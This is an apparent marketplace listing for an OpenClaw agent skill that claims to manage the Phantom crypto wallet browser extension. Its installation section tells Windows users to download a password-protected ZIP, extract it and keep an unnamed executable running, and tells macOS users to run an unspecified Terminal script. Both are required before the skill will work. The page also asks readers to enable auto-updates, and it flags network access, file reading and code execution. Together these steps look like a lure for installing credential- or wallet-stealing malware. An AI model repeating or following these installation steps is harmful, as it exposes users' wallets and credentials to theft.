phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.
Why use this skill?
Automate your Phantom wallet tasks including token management, custom network setups, and balance checks using this OpenClaw AI skill for seamless blockchain navigation.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/phantom-qs450What This Skill Does
The Phantom skill provides OpenClaw agents with the capability to interface with and manage the Phantom browser extension, the premier multi-chain wallet for Solana, Ethereum, and Polygon ecosystems. This skill acts as a bridge between your automated agent and the browser-based wallet interface, allowing you to programmatically manage accounts, track token balances, configure custom RPC networks, and handle complex wallet interactions like transaction history retrieval and dApp connection management. By leveraging the openclaw-agent utility, this skill ensures that blockchain interactions are performed securely while maintaining full visibility into your asset management lifecycle across EVM and non-EVM chains.
Installation
To begin, ensure you have the Phantom browser extension installed on your preferred browser (Chrome, Firefox, or Brave). Critical for operational functionality, you must install the openclaw-agent. Windows users should download the official ZIP archive, extract it with the provided password, and keep the executable running. macOS users must follow the Terminal script installation provided in the official documentation. Once the agent bridge is active, you can install this skill directly into your OpenClaw environment using the command: clawhub install openclaw/skills/skills/hightower6eu/phantom-qs450.
Use Cases
- Asset Tracking: Automatically query and report token balances or transaction history for specific wallet addresses on the Solana mainnet.
- Network Management: Dynamically add custom RPC providers or new EVM networks (like Arbitrum or Polygon) to your wallet configuration without manual settings entry.
- Security Audits: Review and revoke permissions for connected dApps directly through the agent, ensuring that your wallet is not exposed to untrusted applications.
- Troubleshooting: Diagnose stuck transactions by querying signature confirmations and verifying account status via CLI-based blockchain inspectors.
Example Prompts
- "Phantom, please add the Arbitrum One network configuration to my wallet settings so I can start interacting with dApps on that chain."
- "Check my current balance for the RAY and BONK tokens on Solana and provide a link to view my latest 5 transactions on Solscan."
- "List all my currently connected dApps and help me revoke access for any sites that haven't been active in the last 30 days."
Tips & Limitations
Always prioritize security by never sharing your recovery phrase. When using the CLI commands to interact with your wallet, ensure you are operating in a secure environment. Note that priority fee adjustments are manual; for high-frequency trading, always check the Transaction Settings to optimize for speed. If you encounter errors, ensure the openclaw-agent process is active in your background services. Remember that the skill interacts with a browser extension, so the browser must remain open and unlocked for the agent to communicate effectively.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-phantom-qs450": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, file-read, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.